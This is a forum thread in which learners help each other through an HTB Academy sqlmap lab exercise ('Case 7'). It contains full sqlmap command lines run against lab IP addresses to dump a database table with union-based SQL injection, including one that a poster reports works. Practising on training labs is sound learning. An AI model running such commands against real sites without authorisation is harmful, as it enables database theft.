Hi to all, I am getting stuck on SQLmap Essential - Case 7. (HTB Academy)
I have been using this to no avail
sqlmap -u ‘http://46.101.32.158:32274/case7.php?id=1 ’ --batch --dump -T flag7 --level=5 --risk=3 --random-agent --union-cols=1-9 -v 3
and also this where I specify the technique
sqlmap -u ‘http://46.101.32.158:32274/case7.php?id=1 ’ --batch --dump -T flag7 --level=5 --risk=3 --random-agent --technique=U --union-cols=1-9 -v 3
Can someone give me a nudge on what I am doing wrong?
Thank you
ardath
July 12, 2022, 7:16pm
2
Hello
Parse the arguments you specified when you find out how to solve the problem, the solution is on the surface)
I don’t understand the way to solve the issue. I am able to solve it using
sqlmap -u http://134.209.17.36:30901/case7.php?id=1 --union-cols=5 --dump --no-cast
but even if I use --union-cols=1-9 I receive the token. Unfortunately I don’t see any description on how can I count the cols. Overall for me the basic descriptions are missing in HTB academy for sqlmap.
2 Likes
Hello,
The answer to get the flag is in the previous tasks, HTB assumes you have used them / or know about them, that’s why they doesn’t mention them anymore
Hint : the comand is almost correct, but you are missing one part to “dump” the flag data from to defined table